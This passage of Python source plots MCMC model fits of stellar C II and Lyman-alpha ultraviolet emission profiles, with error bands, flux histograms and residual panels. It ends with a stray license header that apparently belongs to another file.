# transform=ax.transAxes,fontsize=12., color='black')
# ax.text(0.97,0.88,r'$\chi^{2}_{\nu}$ = ' + str(round(chi2_mcmc/dof_mcmc,1)),verticalalignment='top',horizontalalignment='right',
# transform=ax.transAxes,fontsize=12., color='black')
#
# outfile_str = spec_header['STAR'] + descrip + '_bestfit.png'
# plt.savefig(outfile_str)
def profile_cii(wave_to_fit, flux_to_fit, error_to_fit, resolution,
                model_best_fit, lya_intrinsic_profile_mcmc, variables, param_order, samples = None,
                perform_error=True, nbins=100):
    """Plot the C II doublet fit (1334.532 / 1335.708 A), analogous to ``profile``.

    Builds the same three-panel figure (fit, zoom, residuals) and, when
    ``perform_error`` is True and ``samples`` is supplied, rebuilds the model
    for every posterior sample to draw 2.5/50/97.5 percentile bands plus a
    histogram of the reconstructed C II flux. The second doublet member is
    modeled at twice the amplitude of the first (2:1 ratio, hard-coded).

    Parameters mirror ``profile``; no Voigt option here — the intrinsic
    profile is always the Gaussian parameterization from
    ``lyapy.lya_intrinsic_profile_func``.

    Returns
    -------
    (low_flux, mid_flux, high_flux) when ``perform_error`` is True.
    NOTE(review): when ``samples`` is None, ``ndim`` is never assigned and
    the reduced-chi^2 computation below raises NameError; likewise
    ``low_flux`` etc. are undefined if ``samples`` is None but
    ``perform_error`` is True.
    """
    f = plt.figure(figsize=(8,9))
    plt.rc('text', usetex=True)
    plt.rc('font', family='sans-serif', size=14)
    # Three stacked panels: full-scale fit (ax), zoom (axx), residuals (axxx).
    gs = gridspec.GridSpec(3, 1, height_ratios=[3, 3, 1])
    ax = plt.subplot(gs[0])
    axx = plt.subplot(gs[1])
    axxx = plt.subplot(gs[2])
    if samples is not None:
        ndim = len(samples[0])
        #print ndim
        if perform_error:
            # Rebuild the model for every posterior sample (no thinning here).
            model_fits = np.zeros((len(samples),len(wave_to_fit)))
            intrinsic_profs = np.zeros((len(samples),len(wave_to_fit)))
            for i, sample in enumerate(samples):
                # Merge sampled (varied) and fixed parameter values in param_order.
                theta_all = []
                j = 0
                for p in param_order:
                    if variables[p]['vary']:
                        theta_all.append(sample[j])
                        j = j+1
                    else:
                        theta_all.append(variables[p]['value'])
                vs_i, am_i, fw_i, h1_col_i, h1_b_i, h1_vel_i = theta_all
                # Doublet: second member at the same velocity/width with
                # twice the amplitude.
                lya_intrinsic_profile = lyapy.lya_intrinsic_profile_func(wave_to_fit,
                                            vs_i,10**am_i,fw_i,
                                            single_component_flux=True,line_center=1334.532)
                other_intrinsic_profile = lyapy.lya_intrinsic_profile_func(wave_to_fit,
                                            vs_i,2.*(10**am_i),fw_i,
                                            single_component_flux=True,line_center=1335.708)
                lya_intrinsic_profile += other_intrinsic_profile
                intrinsic_profs[i,:] = lya_intrinsic_profile
                # Attenuate by the C II ISM opacity and convolve to the
                # instrument resolution.
                total_attenuation = lyapy.total_tau_profile_func_cii(wave_to_fit,
                                        h1_col_i,h1_b_i,h1_vel_i)
                model_fit = lyapy.damped_lya_profile_shortcut(wave_to_fit,resolution,
                                lya_intrinsic_profile, total_attenuation)/1e14
                model_fits[i,:] = model_fit
            # Per-wavelength 2.5/50/97.5 percentile summaries.
            low = np.zeros_like(wave_to_fit)
            mid = np.zeros_like(wave_to_fit)
            high = np.zeros_like(wave_to_fit)
            low_intr = np.zeros_like(wave_to_fit)
            mid_intr = np.zeros_like(wave_to_fit)
            high_intr = np.zeros_like(wave_to_fit)
            for i in np.arange(len(wave_to_fit)):
                low[i], mid[i], high[i] = np.percentile(model_fits[:,i], [2.5,50,97.5])
                low_intr[i], mid_intr[i], high_intr[i] = np.percentile(intrinsic_profs[:,i], [2.5,50,97.5])
            ax.fill_between(wave_to_fit, low, high, color='grey')
            axx.fill_between(wave_to_fit, low, high, color='grey')
            # Integrated flux per sample for the histogram figure.
            reconstructed_flux = np.zeros(len(intrinsic_profs))
            for i,prof in enumerate(intrinsic_profs):
                reconstructed_flux[i] = np.trapz(prof,wave_to_fit)
            low_flux,mid_flux, high_flux = np.percentile(reconstructed_flux, [2.5,50,97.5])
            # Histogram of reconstructed fluxes (new figure).
            f2 = plt.figure()
            ax2 = f2.add_subplot(1,1,1)
            n,bins,patches=ax2.hist(reconstructed_flux,bins=nbins)
            ax2.vlines(low_flux,0,1.1*np.max(n),color='k',linestyle='--')
            ax2.vlines(high_flux,0,1.1*np.max(n),color='k',linestyle='--')
            # NOTE(review): x-label says Ly-alpha although this is the C II fit.
            ax2.set_xlabel('Ly$\\alpha$ flux (erg cm$^{-2}$ s$^{-1}$)')
            ax2.minorticks_on()
            best_fit_flux = np.trapz(lya_intrinsic_profile_mcmc,wave_to_fit)
            ax2.vlines(best_fit_flux,0,1.1*np.max(n),color='r')
            # Format flux as mantissa x 10^exponent for the annotation.
            lya_intrinsic_flux_argument = float(("%e" % best_fit_flux).split('e')[0])
            lya_intrinsic_flux_exponent = float(("%e" % best_fit_flux).split('e')[1])
            ax2.text(0.55,0.98,r'C II flux= ('+ str(round(lya_intrinsic_flux_argument,2)) + \
                '$^{+' + str(round((high_flux-best_fit_flux)/10**lya_intrinsic_flux_exponent,2)) + \
                '}_{-' + str(round((best_fit_flux-low_flux)/10**lya_intrinsic_flux_exponent,2)) + \
                '}$) ' + r'$\times$'+ ' 10$^{' + str(int(lya_intrinsic_flux_exponent)) + '}$',
                verticalalignment='top',horizontalalignment='left',
                transform=ax2.transAxes,fontsize=12., color='black')
            ax2.text(0.97,0.93,r'erg cm$^{-2}$ s$^{-1}$',verticalalignment='top',horizontalalignment='right',
                transform=ax2.transAxes,fontsize=12., color='black')
    # Data and best-fit model on both fit panels.
    ax.step(wave_to_fit,flux_to_fit,'k',where='mid')
    axx.step(wave_to_fit,flux_to_fit,'k',where='mid')
    # Error bars on every 5th point only, to avoid clutter.
    mask=[]
    for i in range(len(wave_to_fit)):
        if (i%5 == 0):
            mask.append(i)
    short_wave = wave_to_fit[mask]
    error_bars_short = error_to_fit[mask]
    short_flux = flux_to_fit[mask]
    ax.errorbar(short_wave,short_flux,yerr=error_bars_short,
                fmt="none",ecolor='limegreen',elinewidth=3,capthick=3)
    ax.plot(wave_to_fit,model_best_fit,'deeppink',linewidth=1.5)
    axx.errorbar(short_wave,short_flux,yerr=error_bars_short,
                 fmt="none",ecolor='limegreen',elinewidth=3,capthick=3)
    axx.plot(wave_to_fit,model_best_fit,'deeppink',linewidth=1.5)
    # Best-fit intrinsic profile: the two doublet members and their sum.
    narrow_component = lyapy.lya_intrinsic_profile_func(wave_to_fit,
                            variables['vs']['best'][0],
                            10**variables['am']['best'][0],
                            variables['fw']['best'][0],
                            single_component_flux=True,line_center=1334.532)
    broad_component = lyapy.lya_intrinsic_profile_func(wave_to_fit,
                            variables['vs']['best'][0],
                            2.*(10**variables['am']['best'][0]),
                            variables['fw']['best'][0],
                            single_component_flux=True,line_center=1335.708)
    lya_intrinsic_profile_bestfit = narrow_component + broad_component
    narrow_component_convolved = np.convolve(narrow_component,resolution,mode='same')
    ax.plot(wave_to_fit,narrow_component_convolved,'r:',linewidth=0.7)
    axx.plot(wave_to_fit,narrow_component_convolved,'r:',linewidth=0.7)
    broad_component_convolved = np.convolve(broad_component,resolution,mode='same')
    ax.plot(wave_to_fit,broad_component_convolved,'g:',linewidth=0.7)
    axx.plot(wave_to_fit,broad_component_convolved,'g:',linewidth=0.7)
    lya_intrinsic_profile_bestfit_convolved = np.convolve(lya_intrinsic_profile_bestfit,resolution,mode='same')
    ax.plot(wave_to_fit,lya_intrinsic_profile_bestfit_convolved,'b--',linewidth=1.3)
    axx.plot(wave_to_fit,lya_intrinsic_profile_bestfit_convolved,'b--',linewidth=1.3)
    # Axis cosmetics.
    ax.set_ylabel(r'Flux ' r'(erg s$^{-1}$ cm$^{-2}$ \AA$^{-1}$)',fontsize=14)
    ax.minorticks_on()
    axx.set_ylabel(r'Flux ' r'(erg s$^{-1}$ cm$^{-2}$ \AA$^{-1}$)',fontsize=14)
    axx.minorticks_on()
    ax.set_ylim([-np.max(flux_to_fit)/10.,np.max(lya_intrinsic_profile_bestfit_convolved)*1.1])
    axx.set_ylim([-np.max(flux_to_fit)/100.,np.max(flux_to_fit)*0.1])
    plt.ticklabel_format(useOffset=False)
    # Residuals panel with reduced chi^2 annotation.
    # NOTE(review): ndim is only defined when samples is not None.
    residuals = (flux_to_fit - model_best_fit) / error_to_fit
    chi2 = np.sum( residuals**2 )
    dof = len(flux_to_fit) - ndim - 1
    axxx.plot(wave_to_fit,residuals,'ko')
    axxx.set_xlabel(r'Wavelength (\AA)',fontsize=14)
    axxx.set_ylabel('Residuals',fontsize=14)
    axxx.minorticks_on()
    axxx.hlines(0,np.min(wave_to_fit),np.max(wave_to_fit),linestyle='--',color='grey')
    axxx.hlines(1,np.min(wave_to_fit),np.max(wave_to_fit),linestyle=':',color='grey')
    axxx.hlines(-1,np.min(wave_to_fit),np.max(wave_to_fit),linestyle=':',color='grey')
    axxx.text(0.03,0.2,'$\\chi_{\\nu}^2$ = ' + str(round(chi2/dof,2)),verticalalignment='top',
              horizontalalignment='left',transform=axxx.transAxes,fontsize=12., color='black')
    if perform_error:
        return low_flux, mid_flux, high_flux
######
######
def profile_rev(wave_to_fit, flux_to_fit, error_to_fit, resolution,
                model_best_fit, lya_intrinsic_profile_mcmc, variables, param_order, samples = None,
                perform_error=True, Voigt=False, Lorentzian=False, nbins=100, thin_out = 1.0):
    """Plot the MCMC best-fit Lyman-alpha model using a self-reversed intrinsic profile.

    Produces a three-panel figure (data + model, zoomed flux scale, residuals),
    a separate figure of the self-reversal factors, and -- when `perform_error`
    is True and `samples` is given -- percentile error envelopes plus a
    histogram of the reconstructed intrinsic Lyman-alpha fluxes.

    Parameters
    ----------
    wave_to_fit, flux_to_fit, error_to_fit : arrays
        Observed wavelength grid (Angstroms), flux and 1-sigma errors.
    resolution : array
        Instrument line-spread kernel passed to np.convolve (mode='same').
    model_best_fit : array
        Best-fit attenuated model evaluated on wave_to_fit.
    lya_intrinsic_profile_mcmc : array
        Best-fit intrinsic (unattenuated) profile; integrated for the flux label.
    variables, param_order : dict, sequence
        Fit parameter descriptions and their ordering (see lyapy conventions).
    samples : 2-D array or None
        Posterior samples (one row per sample, one column per varying parameter).
    thin_out : float
        Keep only every `thin_out`-th sample when building error envelopes.

    Returns
    -------
    (LyA_intr_fluxes, LyA_bestfit_models, LyA_intr_profiles, rev_profiles)
    when `perform_error` is True, otherwise None.

    NOTE(review): the percentile arrays returned when `perform_error` is True
    are only built inside the `samples is not None` branch, and `ndim` (used in
    the reduced chi^2) is also only defined there -- callers presumably always
    pass `samples`; confirm.
    """
    # Main figure: data + model (top), zoomed-in flux (middle), residuals (bottom).
    f = plt.figure(figsize=(8,9))
    plt.rc('text', usetex=True)
    plt.rc('font', family='sans-serif', size=14)
    gs = gridspec.GridSpec(3, 1, height_ratios=[3, 3, 1])
    ax = plt.subplot(gs[0])
    axx = plt.subplot(gs[1])
    axxx = plt.subplot(gs[2])
    # Separate figure for the multiplicative self-reversal profiles.
    fig_revs = plt.figure()
    ax_rev = fig_revs.add_subplot(111)
    if samples is not None:
        ndim = len(samples[0])
        #print ndim
        if perform_error:
            # Evaluate a full model for every `thin_out`-th posterior sample
            # so percentile envelopes can be computed per wavelength bin.
            array_length = int(len(samples)/thin_out)
            model_fits = np.zeros((array_length,len(wave_to_fit)))
            intrinsic_profs = np.zeros((array_length,len(wave_to_fit)))
            #SiIII_profs = np.zeros((array_length,len(wave_to_fit)))
            rev_profs = np.zeros((array_length,len(wave_to_fit)))
            lnprobs = np.zeros(array_length)
            #for i, sample in enumerate(samples[np.random.randint(len(samples), size=10)]):
            i=-1
            for ll, sample in enumerate(samples):
                if (ll % thin_out) == 0:
                    i += 1
                    # Rebuild the full parameter vector: sampled values for the
                    # varying parameters, stored fixed values for the rest.
                    theta_all = []
                    theta = []
                    j = 0
                    for p in param_order:
                        if variables[p]['vary']:
                            theta_all.append(sample[j])
                            theta.append(sample[j])
                            j = j+1
                        else:
                            theta_all.append(variables[p]['value'])
                    # NOTE(review): always-true guard, presumably left over from
                    # an earlier conditional; kept to preserve structure.
                    if True:
                        vs_i, am_i, fw_L_i, fw_G_i, h1_col_i, h1_b_i, h1_vel_i, d2h_i, vs_rev_i, am_rev_i, \
                            fw_rev_i = theta_all
                        # Velocity shift (km/s) -> line center in Angstroms.
                        line_center_i = vs_i/3e5*1215.67+1215.67
                        sigma_G_i = fw_G_i/3e5 * 1215.67 #/ 2.3548
                        # Lorentzian width: either tied to the Gaussian width by a
                        # fixed (or sampled, ratio == -1) factor, or independent.
                        if variables['fw_G']['fw_G_fw_L_fixed_ratio'] != 0:
                            if variables['fw_G']['fw_G_fw_L_fixed_ratio'] == -1:
                                sigma_L_i = fw_G_i * fw_L_i /3e5 * 1215.67 / 2.
                            else:
                                sigma_L_i = fw_G_i * variables['fw_G']['fw_G_fw_L_fixed_ratio'] /3e5 * 1215.67 / 2.
                        else:
                            sigma_L_i = fw_L_i/3e5 * 1215.67 #/ 2.
                        if Lorentzian:
                            voigt_profile_func_i = Lorentz1D(x_0 = line_center_i, amplitude = 10**am_i,
                                fwhm = sigma_L_i)
                        else:
                            voigt_profile_func_i = Voigt1D(x_0 = line_center_i, amplitude_L = 10**am_i,
                                fwhm_L = sigma_L_i, fwhm_G = sigma_G_i)
                        lya_intrinsic_profile = voigt_profile_func_i(wave_to_fit)
                        # Self-reversal: a Gaussian factor multiplied into the profile.
                        g_func = Gaussian1D(mean = vs_rev_i/3e5*1215.67+1215.67, amplitude=am_rev_i,stddev=fw_rev_i/3e5*1215.67/2.3548)
                        rev_profile = g_func(wave_to_fit)
                        lya_intrinsic_profile *= (rev_profile + 1.)
                        rev_profs[i,:] = rev_profile + 1.
                        intrinsic_profs[i,:] = np.convolve(lya_intrinsic_profile,resolution,mode='same')
                        # Apply the H I (+ deuterium) attenuation to get the observed model.
                        total_attenuation = lyapy.total_tau_profile_func(wave_to_fit,
                            h1_col_i,h1_b_i,h1_vel_i,d2h_i)
                        model_fit = lyapy.damped_lya_profile_shortcut(wave_to_fit,resolution,
                            lya_intrinsic_profile, total_attenuation)/1e14
                        model_fits[i,:] = model_fit
                        #lnprobs[i] = lyapy.lnprob_voigt_rev(theta,wave_to_fit,flux_to_fit,error_to_fit,variables)
                        #max_lnprob_index = np.where(lnprobs == np.max(lnprobs))
                        #plt.plot(wave_to_fit,model_fit,'deeppink',linewidth=1., alpha=0.1)
                        # Overplot a thinned subset of sample models for visual spread.
                        if i%20 == 0:
                            ax.plot(wave_to_fit,model_fit,color='k',alpha=0.3)
                            ax_rev.plot(wave_to_fit,rev_profile + 1.,color='k',alpha=0.3)
            # Per-wavelength 2-sigma / 1-sigma / median envelopes for the
            # attenuated model, the intrinsic profile and the reversal factor.
            sig2_low = np.zeros_like(wave_to_fit)
            sig1_low = np.zeros_like(wave_to_fit)
            median = np.zeros_like(wave_to_fit)
            sig1_high = np.zeros_like(wave_to_fit)
            sig2_high = np.zeros_like(wave_to_fit)
            sig2_low_intr_prof = np.zeros_like(wave_to_fit)
            sig1_low_intr_prof = np.zeros_like(wave_to_fit)
            median_intr_prof = np.zeros_like(wave_to_fit)
            sig1_high_intr_prof = np.zeros_like(wave_to_fit)
            sig2_high_intr_prof = np.zeros_like(wave_to_fit)
            sig2_low_rev_prof = np.zeros_like(wave_to_fit)
            sig1_low_rev_prof = np.zeros_like(wave_to_fit)
            median_rev_prof = np.zeros_like(wave_to_fit)
            sig1_high_rev_prof = np.zeros_like(wave_to_fit)
            sig2_high_rev_prof = np.zeros_like(wave_to_fit)
            #sig2_low_intr = np.zeros_like(wave_to_fit)
            #sig1_low_intr = np.zeros_like(wave_to_fit)
            #median_intr = np.zeros_like(wave_to_fit)
            #sig1_high_intr = np.zeros_like(wave_to_fit)
            #sig2_high_intr = np.zeros_like(wave_to_fit)
            #sig2_low_SiIII = np.zeros_like(wave_to_fit)
            #sig1_low_SiIII = np.zeros_like(wave_to_fit)
            #median_SiIII = np.zeros_like(wave_to_fit)
            #sig1_high_SiIII = np.zeros_like(wave_to_fit)
            #sig2_high_SiIII = np.zeros_like(wave_to_fit)
            for i in np.arange(len(wave_to_fit)):
                sig2_low[i], sig1_low[i], median[i], sig1_high[i], sig2_high[i] = \
                    np.percentile(model_fits[:,i], [2.5,15.9,50,84.1,97.5])
                sig2_low_intr_prof[i], sig1_low_intr_prof[i], median_intr_prof[i], sig1_high_intr_prof[i], sig2_high_intr_prof[i] = \
                    np.percentile(intrinsic_profs[:,i], [2.5,15.9,50,84.1,97.5])
                #sig2_low_SiIII_prof[i], sig1_low_SiIII_prof[i], median_SiIII_prof[i], sig1_high_SiIII_prof[i], sig2_high_SiIII_prof[i] = \
                #    np.percentile(SiIII_profs[:,i], [2.5,15.9,50,84.1,97.5])
                sig2_low_rev_prof[i], sig1_low_rev_prof[i], median_rev_prof[i], sig1_high_rev_prof[i], sig2_high_rev_prof[i] = \
                    np.percentile(rev_profs[:,i], [2.5,15.9,50,84.1,97.5])
                #low_intr[i], mid_intr[i], high_intr[i] = np.percentile(intrinsic_profs[:,i], [2.5,50,97.5])
                #low_SiIII[i], mid_SiIII[i], high_SiIII[i] = np.percentile(SiIII_profs[:,i], [2.5, 50, 97.5])
            # Shaded confidence bands: grey for the model, pink for the intrinsic profile.
            ax.fill_between(wave_to_fit, sig2_low, sig2_high, color='lightgrey')
            axx.fill_between(wave_to_fit, sig2_low, sig2_high, color='lightgrey')
            ax.fill_between(wave_to_fit, sig1_low, sig1_high, color='grey')
            axx.fill_between(wave_to_fit, sig1_low, sig1_high, color='grey')
            ax.fill_between(wave_to_fit, sig2_low_intr_prof, sig2_high_intr_prof, color='lavenderblush')
            axx.fill_between(wave_to_fit, sig2_low_intr_prof, sig2_high_intr_prof, color='lavenderblush')
            ax.fill_between(wave_to_fit, sig1_low_intr_prof, sig1_high_intr_prof, color='lightpink')
            axx.fill_between(wave_to_fit, sig1_low_intr_prof, sig1_high_intr_prof, color='lightpink')
            # Integrate each sampled intrinsic profile to get a flux posterior.
            reconstructed_flux = np.zeros(len(intrinsic_profs))
            #SiIII_flux = np.zeros(len(intrinsic_profs))
            for i,prof in enumerate(intrinsic_profs):
                reconstructed_flux[i] = np.trapz(prof,wave_to_fit)
                #SiIII_flux[i] = np.trapz(SiIII_profs[i],wave_to_fit)
            #plt.histogram
            sig2_low_intr, sig1_low_intr, median_intr, sig1_high_intr, sig2_high_intr = \
                np.percentile(reconstructed_flux, [2.5,15.9,50,84.1,97.5])
            #sig2_low_SiIII, sig1_low_SiIII, median_SiIII, sig1_high_SiIII, sig2_high_SiIII = \
            #    np.percentile(SiIII_flux, [2.5,15.9,50,84.1,97.5])
            #import pdb; pdb.set_trace()
            #for i in range(len(max_lnprob_index[0])):
            #ax.plot(wave_to_fit,model_fits[max_lnprob_index[0][i],:],color='orange')
            #axx.plot(wave_to_fit,model_fits[max_lnprob_index[0][i],:],color='orange')
            # Histogram of the reconstructed-flux posterior with 1/2-sigma markers.
            f2 = plt.figure()
            ax2 = f2.add_subplot(1,1,1)
            n,bins,patches=ax2.hist(reconstructed_flux,bins=nbins)
            ax2.vlines(sig2_low_intr,0,1.1*np.max(n),color='k',linestyle='--')
            ax2.vlines(sig1_low_intr,0,1.1*np.max(n),linestyle='--',color='grey')
            #ax2.vlines(mid_flux,0,1.1*np.max(n),color='k')
            ax2.vlines(sig2_high_intr,0,1.1*np.max(n),color='k',linestyle='--')
            ax2.vlines(sig1_high_intr,0,1.1*np.max(n),linestyle='--',color='grey')
            ax2.set_xlabel('Ly$\\alpha$ flux (erg cm$^{-2}$ s$^{-1}$)')
            ax2.minorticks_on()
            best_fit_flux = np.trapz(lya_intrinsic_profile_mcmc,wave_to_fit)
            ax2.vlines(best_fit_flux,0,1.1*np.max(n),color='r')
            #ax2.vlines(np.trapz(intrinsic_profs[max_lnprob_index,:],wave_to_fit),0,1.1*np.max(n),color='orange')
            # Split the flux into mantissa/exponent for a compact annotation.
            lya_intrinsic_flux_argument = float(("%e" % best_fit_flux).split('e')[0])
            lya_intrinsic_flux_exponent = float(("%e" % best_fit_flux).split('e')[1])
            ax2.text(0.55,0.98,r'Ly$\alpha$ flux= ('+ str(round(lya_intrinsic_flux_argument,2)) + \
                '$^{+' + str(round((sig2_high_intr-best_fit_flux)/10**lya_intrinsic_flux_exponent,2)) + \
                '}_{-' + str(round((best_fit_flux-sig2_low_intr)/10**lya_intrinsic_flux_exponent,2)) + \
                '}$) ' + r'$\times$'+ ' 10$^{' + str(int(lya_intrinsic_flux_exponent)) + '}$',
                verticalalignment='top',horizontalalignment='left',
                transform=ax2.transAxes,fontsize=12., color='black')
            ax2.text(0.97,0.93,r'erg cm$^{-2}$ s$^{-1}$',verticalalignment='top',horizontalalignment='right',
                transform=ax2.transAxes,fontsize=12., color='black')
            #f3 = plt.figure()
            #ax3 = f3.add_subplot(1,1,1)
            #n,bins,patches=ax3.hist(SiIII_flux,bins=nbins)
            #ax3.vlines(sig2_low_SiIII,0,1.1*np.max(n),color='k',linestyle='--')
            #ax2.vlines(mid_flux,0,1.1*np.max(n),color='k')
            #ax3.vlines(sig2_high_SiIII,0,1.1*np.max(n),color='k',linestyle='--')
            #ax3.set_xlabel('Si III flux (erg cm$^{-2}$ s$^{-1}$)')
            #ax3.minorticks_on()
            #ax3.set_title(str(sig2_low_SiIII) + ', ' + str(sig1_low_SiIII) + ', ' + str(median_SiIII) + ', ' + str(sig1_high_SiIII) + ', ' + str(sig2_high_SiIII))
            #best_fit_flux = np.trapz(lya_intrinsic_profile_mcmc,wave_to_fit)
            #ax2.vlines(best_fit_flux,0,1.1*np.max(n),color='r')
            #lya_intrinsic_flux_argument = float(("%e" % best_fit_flux).split('e')[0])
            #lya_intrinsic_flux_exponent = float(("%e" % best_fit_flux).split('e')[1])
            #ax2.text(0.55,0.98,r'Ly$\alpha$ flux= ('+ str(round(lya_intrinsic_flux_argument,2)) + \
            #    '$^{+' + str(round((high_flux-best_fit_flux)/10**lya_intrinsic_flux_exponent,2)) + \
            #    '}_{-' + str(round((best_fit_flux-low_flux)/10**lya_intrinsic_flux_exponent,2)) + \
            #    '}$) ' + r'$\times$'+ ' 10$^{' + str(int(lya_intrinsic_flux_exponent)) + '}$',
            #    verticalalignment='top',horizontalalignment='left',
            #    transform=ax2.transAxes,fontsize=12., color='black')
            #ax2.text(0.97,0.93,r'erg cm$^{-2}$ s$^{-1}$',verticalalignment='top',horizontalalignment='right',
            #    transform=ax2.transAxes,fontsize=12., color='black')
    # Observed data as a step plot, with error bars on every 5th point.
    ax.step(wave_to_fit,flux_to_fit,'k',where='mid')
    axx.step(wave_to_fit,flux_to_fit,'k',where='mid')
    mask=[]
    for i in range(len(wave_to_fit)):
        if (i%5 == 0):
            mask.append(i)
    #short_wave = np.linspace(wave_to_fit[0],wave_to_fit[-1],25)
    #error_bars_short = np.interp(short_wave,wave_to_fit,error_to_fit)
    #short_flux = np.interp(short_wave,wave_to_fit,flux_to_fit)
    short_wave = wave_to_fit[mask]
    error_bars_short = error_to_fit[mask]
    short_flux = flux_to_fit[mask]
    ax.errorbar(short_wave,short_flux,yerr=error_bars_short,
        fmt="none",ecolor='limegreen',elinewidth=3,capthick=3)
    ax.plot(wave_to_fit,model_best_fit,'deeppink',linewidth=1.5)
    axx.errorbar(short_wave,short_flux,yerr=error_bars_short,
        fmt="none",ecolor='limegreen',elinewidth=3,capthick=3)
    axx.plot(wave_to_fit,model_best_fit,'deeppink',linewidth=1.5)
    #plot the intrinsic profile + components
    if not Voigt:
        # Multi-Gaussian intrinsic profile: narrow + optional broad + optional
        # "HAW" component, each read from the stored best-fit values.
        narrow_component = lyapy.lya_intrinsic_profile_func(wave_to_fit,
            variables['vs_n']['best'][0],
            10**variables['am_n']['best'][0],
            variables['fw_n']['best'][0],
            single_component_flux=True)
        if not variables['am_b']['single_comp']:
            broad_component = lyapy.lya_intrinsic_profile_func(wave_to_fit,
                variables['vs_b']['best'][0],
                10**variables['am_b']['best'][0],
                variables['fw_b']['best'][0],
                single_component_flux=True)
            lya_intrinsic_profile_bestfit = narrow_component + broad_component
        else:
            lya_intrinsic_profile_bestfit = narrow_component
        if variables['vs_haw']['HAW']:
            haw_component = lyapy.lya_intrinsic_profile_func(wave_to_fit,
                variables['vs_haw']['best'][0],
                10**variables['am_haw']['best'][0],
                variables['fw_haw']['best'][0],
                single_component_flux=True)
            lya_intrinsic_profile_bestfit += haw_component
        narrow_component_convolved = np.convolve(narrow_component,resolution,mode='same')
        ax.plot(wave_to_fit,narrow_component_convolved,'r:',linewidth=0.7)
        axx.plot(wave_to_fit,narrow_component_convolved,'r:',linewidth=0.7)
        if not variables['am_b']['single_comp']:
            broad_component_convolved = np.convolve(broad_component,resolution,mode='same')
            ax.plot(wave_to_fit,broad_component_convolved,'g:',linewidth=0.7)
            axx.plot(wave_to_fit,broad_component_convolved,'g:',linewidth=0.7)
        if variables['vs_haw']['HAW']:
            haw_component_convolved = np.convolve(haw_component,resolution,mode='same')
            ax.plot(wave_to_fit,haw_component_convolved,'c:',linewidth=0.7)
            axx.plot(wave_to_fit,haw_component_convolved,'c:',linewidth=0.7)
    else:
        # Voigt (or Lorentzian) intrinsic profile from the MLE parameters,
        # multiplied by the Gaussian self-reversal factor (same recipe as above).
        line_center_mle = variables['vs']['mle_best']/3e5*1215.67+1215.67
        sigma_G_mle = variables['fw_G']['mle_best']/3e5 * 1215.67 #/ 2.3548
        if variables['fw_G']['fw_G_fw_L_fixed_ratio'] != 0:
            if variables['fw_G']['fw_G_fw_L_fixed_ratio'] == -1:
                sigma_L_mle = variables['fw_G']['mle_best'] * variables['fw_L']['mle_best'] /3e5 * 1215.67 #/ 2.
            else:
                sigma_L_mle = variables['fw_G']['mle_best'] * variables['fw_G']['fw_G_fw_L_fixed_ratio'] /3e5 * 1215.67 #/ 2.
        else:
            sigma_L_mle = variables['fw_L']['mle_best']/3e5 * 1215.67 #/ 2.
        if Lorentzian:
            voigt_profile_func_mle = Lorentz1D(x_0 = line_center_mle, amplitude = 10**variables['am']['mle_best'],
                fwhm = sigma_L_mle)
        else:
            voigt_profile_func_mle = Voigt1D(x_0 = line_center_mle, amplitude_L = 10**variables['am']['mle_best'],
                fwhm_L = sigma_L_mle, fwhm_G = sigma_G_mle)
        lya_intrinsic_profile_bestfit = voigt_profile_func_mle(wave_to_fit)
        g_func = Gaussian1D(mean = variables['vs_rev']['mle_best']/3e5*1215.67+1215.67,
            amplitude=variables['am_rev']['mle_best'], stddev=variables['fw_rev']['mle_best']/3e5*1215.67/2.3548)
        rev_profile = g_func(wave_to_fit)
        lya_intrinsic_profile_bestfit *= (rev_profile + 1.)
    lya_intrinsic_profile_bestfit_convolved = np.convolve(lya_intrinsic_profile_bestfit,resolution,mode='same')
    ax.plot(wave_to_fit,lya_intrinsic_profile_bestfit_convolved,'b--',linewidth=1.3)
    axx.plot(wave_to_fit,lya_intrinsic_profile_bestfit_convolved,'b--',linewidth=1.3)
    #
    # ax.step(wave_to_fit[mask],flux_to_fit[mask],'lightblue',linewidth=0.8) ## plotting "masked" region
    ax.set_ylabel(r'Flux ' r'(erg s$^{-1}$ cm$^{-2}$ \AA$^{-1}$)',fontsize=14)
    ax.minorticks_on()
    axx.set_ylabel(r'Flux ' r'(erg s$^{-1}$ cm$^{-2}$ \AA$^{-1}$)',fontsize=14)
    axx.minorticks_on()
    # Top panel scaled to the intrinsic profile; middle panel zoomed to the data.
    ax.set_ylim([-np.max(flux_to_fit)/10.,np.max(lya_intrinsic_profile_bestfit_convolved)*1.1])
    axx.set_ylim([-np.max(flux_to_fit)/100.,np.max(flux_to_fit)*0.1])
    plt.ticklabel_format(useOffset=False)
    # Residual panel with reduced chi^2 annotation.
    residuals = (flux_to_fit - model_best_fit) / error_to_fit
    chi2 = np.sum( residuals**2 )
    dof = len(flux_to_fit) - ndim - 1
    axxx.plot(wave_to_fit,residuals,'ko')
    axxx.set_xlabel(r'Wavelength (\AA)',fontsize=14)
    axxx.set_ylabel('Residuals',fontsize=14)
    axxx.minorticks_on()
    axxx.hlines(0,np.min(wave_to_fit),np.max(wave_to_fit),linestyle='--',color='grey')
    axxx.hlines(1,np.min(wave_to_fit),np.max(wave_to_fit),linestyle=':',color='grey')
    axxx.hlines(-1,np.min(wave_to_fit),np.max(wave_to_fit),linestyle=':',color='grey')
    axxx.text(0.03,0.2,'$\\chi_{\\nu}^2$ = ' + str(round(chi2/dof,2)),verticalalignment='top',
        horizontalalignment='left',transform=axxx.transAxes,fontsize=12., color='black')
    if perform_error:
        # Columns: [2.5%, 15.9%, 50%, 84.1%, 97.5%] percentiles.
        LyA_intr_fluxes = np.transpose(np.array([sig2_low_intr, sig1_low_intr, median_intr, sig1_high_intr, sig2_high_intr]))
        LyA_bestfit_models = np.transpose(np.array([sig2_low, sig1_low, median, sig1_high, sig2_high]))
        #SiIII_fluxes = np.transpose([sig2_low_SiIII, sig1_low_SiIII, median_SiIII, sig1_high_SiIII, sig2_high_SiIII])
        LyA_intr_profiles = np.transpose(np.array([sig2_low_intr_prof, sig1_low_intr_prof, median_intr_prof, sig1_high_intr_prof, sig2_high_intr_prof]))
        #SiIII_profiles = np.transpose(np.array([sig2_low_SiIII_prof, sig1_low_SiIII_prof, median_SiIII_prof, sig1_high_SiIII_prof, sig2_high_SiIII_prof]))
        rev_profiles = np.transpose(np.array([sig2_low_rev_prof, sig1_low_rev_prof, median_rev_prof, sig1_high_rev_prof, sig2_high_rev_prof]))
        return LyA_intr_fluxes, LyA_bestfit_models, LyA_intr_profiles, rev_profiles
|
#!/usr/bin/env python
# Copyright 2014, Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can
# be found in the LICENSE file.
|
